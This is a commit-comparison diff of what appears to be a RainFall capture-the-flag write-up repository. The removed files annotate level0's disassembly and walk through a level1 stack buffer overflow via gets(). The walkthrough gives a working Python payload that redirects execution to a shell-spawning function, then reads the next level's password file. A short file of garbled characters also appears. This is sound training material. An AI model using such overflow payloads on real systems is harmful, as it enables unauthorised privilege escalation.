Compare commits
	
		
			No commits in common. "527e40164b3f63cb1716012d21c39b995a087a59" and "2e78142389b9e5f4ca7f8f4c1cbd99b5b32d9f9b" have entirely different histories.
		
	
	
		
			527e40164b
			...
			2e78142389
		
	
		|  | @ -1,58 +0,0 @@ | |||
| 0x08048ec0 <+0>:	push   ebp | ||||
| 0x08048ec1 <+1>:	mov    ebp,esp | ||||
| 0x08048ec3 <+3>:	and    esp,0xfffffff0 | ||||
| 0x08048ec6 <+6>:	sub    esp,0x20 | ||||
| // Save ebp on the stack, esp on ebp, align stack and reserve 32 bytes for the stack | ||||
| 0x08048ec9 <+9>:	mov    eax,DWORD PTR [ebp+0xc] | ||||
| // eax = argv (or &argv[0]) | ||||
| 0x08048ecc <+12>:	add    eax,0x4 | ||||
| // eax = &argv[1] | ||||
| 0x08048ecf <+15>:	mov    eax,DWORD PTR [eax] | ||||
| // eax = argv[1] | ||||
| 0x08048ed1 <+17>:	mov    DWORD PTR [esp],eax | ||||
| // stack[esp] = eax; | ||||
| 0x08048ed4 <+20>:	call   0x8049710 <atoi> | ||||
| // call atoi with argv[1] as argument | ||||
| 0x08048ed9 <+25>:	cmp    eax,0x1a7 | ||||
| // compare atoi result with 423 | ||||
| 0x08048ede <+30>:	jne    0x8048f58 <main+152> | ||||
| // if not equal jump to main+152 which writes "No !" and exits... | ||||
| 0x08048ee0 <+32>:	mov    DWORD PTR [esp],0x80c5348 | ||||
| // or continue here, which will launch a shell, done ! | ||||
| 0x08048ee7 <+39>:	call   0x8050bf0 <strdup> | ||||
| 0x08048eec <+44>:	mov    DWORD PTR [esp+0x10],eax | ||||
| 0x08048ef0 <+48>:	mov    DWORD PTR [esp+0x14],0x0 | ||||
| 0x08048ef8 <+56>:	call   0x8054680 <getegid> | ||||
| 0x08048efd <+61>:	mov    DWORD PTR [esp+0x1c],eax | ||||
| 0x08048f01 <+65>:	call   0x8054670 <geteuid> | ||||
| 0x08048f06 <+70>:	mov    DWORD PTR [esp+0x18],eax | ||||
| 0x08048f0a <+74>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f0e <+78>:	mov    DWORD PTR [esp+0x8],eax | ||||
| 0x08048f12 <+82>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f16 <+86>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f1a <+90>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f1e <+94>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f21 <+97>:	call   0x8054700 <setresgid> | ||||
| 0x08048f26 <+102>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f2a <+106>:	mov    DWORD PTR [esp+0x8],eax | ||||
| 0x08048f2e <+110>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f32 <+114>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f36 <+118>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f3a <+122>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f3d <+125>:	call   0x8054690 <setresuid> | ||||
| 0x08048f42 <+130>:	lea    eax,[esp+0x10] | ||||
| 0x08048f46 <+134>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f4a <+138>:	mov    DWORD PTR [esp],0x80c5348 | ||||
| 0x08048f51 <+145>:	call   0x8054640 <execv> | ||||
| 0x08048f56 <+150>:	jmp    0x8048f80 <main+192> | ||||
| 0x08048f58 <+152>:	mov    eax,ds:0x80ee170 | ||||
| 0x08048f5d <+157>:	mov    edx,eax | ||||
| 0x08048f5f <+159>:	mov    eax,0x80c5350 | ||||
| 0x08048f64 <+164>:	mov    DWORD PTR [esp+0xc],edx | ||||
| 0x08048f68 <+168>:	mov    DWORD PTR [esp+0x8],0x5 | ||||
| 0x08048f70 <+176>:	mov    DWORD PTR [esp+0x4],0x1 | ||||
| 0x08048f78 <+184>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f7b <+187>:	call   0x804a230 <fwrite> | ||||
| 0x08048f80 <+192>:	mov    eax,0x0 | ||||
| 0x08048f85 <+197>:	leave   | ||||
| 0x08048f86 <+198>:	ret | ||||
|  | @ -0,0 +1 @@ | |||
| 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞D<EFBFBD> | ||||
|  | @ -1,93 +0,0 @@ | |||
| Code has 2 functions which are interesting, main and run. | ||||
| We need to execute run, for this we are going to use a buffer overflow attack. | ||||
| For this we've got to input more than the 64 bits allocated for gets command. | ||||
| We are going to override the stack so the ret command jump to run function. | ||||
| 
 | ||||
| ``` | ||||
| 0x08048480 <main+0>:	push   ebp | ||||
| 0x08048481 <main+1>:	mov    ebp,esp | ||||
| 0x08048483 <main+3>:	and    esp,0xfffffff0 | ||||
| 0x08048486 <main+6>:	sub    esp,0x50 | ||||
| 0x08048489 <main+9>:	lea    eax,[esp+0x10] | ||||
| 0x0804848d <main+13>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048490 <main+16>:	call   0x8048340 <gets@plt> | ||||
| 0x08048495 <main+21>:	leave   | ||||
| 0x08048496 <main+22>:	ret | ||||
| ``` | ||||
| 
 | ||||
| ``` | ||||
| 0x08048444 <run+0>:		push   ebp | ||||
| 0x08048445 <run+1>:		mov    ebp,esp | ||||
| 0x08048447 <run+3>:		sub    esp,0x18 | ||||
| 0x0804844a <run+6>:		mov    eax,ds:0x80497c0 | ||||
| 0x0804844f <run+11>:	mov    edx,eax | ||||
| 0x08048451 <run+13>:	mov    eax,0x8048570 | ||||
| 0x08048456 <run+18>:	mov    DWORD PTR [esp+0xc],edx | ||||
| 0x0804845a <run+22>:	mov    DWORD PTR [esp+0x8],0x13 | ||||
| 0x08048462 <run+30>:	mov    DWORD PTR [esp+0x4],0x1 | ||||
| 0x0804846a <run+38>:	mov    DWORD PTR [esp],eax | ||||
| 0x0804846d <run+41>:	call   0x8048350 <fwrite@plt> | ||||
| 0x08048472 <run+46>:	mov    DWORD PTR [esp],0x8048584 | ||||
| 0x08048479 <run+53>:	call   0x8048360 <system@plt> | ||||
| 0x0804847e <run+58>:	leave | ||||
| 0x0804847f <run+59>:	ret | ||||
| ``` | ||||
| 
 | ||||
| Fig 1. Disassembly of main and run functions | ||||
| 
 | ||||
| The first step is to find where the ret address is stored, for this, we will | ||||
| stop the program just before it begins running main and check esp register's | ||||
| value. | ||||
| 
 | ||||
| ``` | ||||
| Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done. | ||||
| (gdb) b *main+0 | ||||
| Breakpoint 1 at 0x8048480 | ||||
| (gdb) run | ||||
| Starting program: /home/user/level1/level1  | ||||
| 
 | ||||
| Breakpoint 1, 0x08048480 in main () | ||||
| (gdb) p $esp | ||||
| $1 = (void *) 0xbffff73c | ||||
| (gdb)  | ||||
| ``` | ||||
| 
 | ||||
| Now we need to go to the gets and input 64 random characters and try to see them | ||||
| on the stack | ||||
| 
 | ||||
| ``` | ||||
| Breakpoint 1, 0x08048495 in main () | ||||
| (gdb) x/128xb $esp | ||||
| 0xbffff6e0:	0xf0	0xf6	0xff	0xbf	0x2f	0x00	0x00	0x00 | ||||
| 0xbffff6e8:	0x3c	0xf7	0xff	0xbf	0xf4	0x0f	0xfd	0xb7 | ||||
| 0xbffff6f0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff6f8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff700:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff708:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff710:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff718:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff720:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff728:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff730:	0x00	0x84	0x04	0x08	0x00	0x00	0x00	0x00 | ||||
| 0xbffff738:	0x00	0x00	0x00	0x00	0xd3	0x54	0xe4	0xb7 | ||||
| 0xbffff740:	0x01	0x00	0x00	0x00	0xd4	0xf7	0xff	0xbf | ||||
| 0xbffff748:	0xdc	0xf7	0xff	0xbf	0x58	0xc8	0xfd	0xb7 | ||||
| 0xbffff750:	0x00	0x00	0x00	0x00	0x1c	0xf7	0xff	0xbf | ||||
| 0xbffff758:	0xdc	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00 | ||||
| ``` | ||||
| 
 | ||||
| We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. | ||||
| That means we still need to put more 'A's, 12 precisely, then the address we want | ||||
| to jump to. | ||||
| 
 | ||||
| ```(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1``` | ||||
| 
 | ||||
| ```level1@RainFall:~$ (python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1 | ||||
| Good... Wait what? | ||||
| whoami | ||||
| level2 | ||||
| cat /home/user/level2/.pass | ||||
| 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77 | ||||
| ``` | ||||
| 
 | ||||
| :) | ||||
		Loading…
	
		Reference in New Issue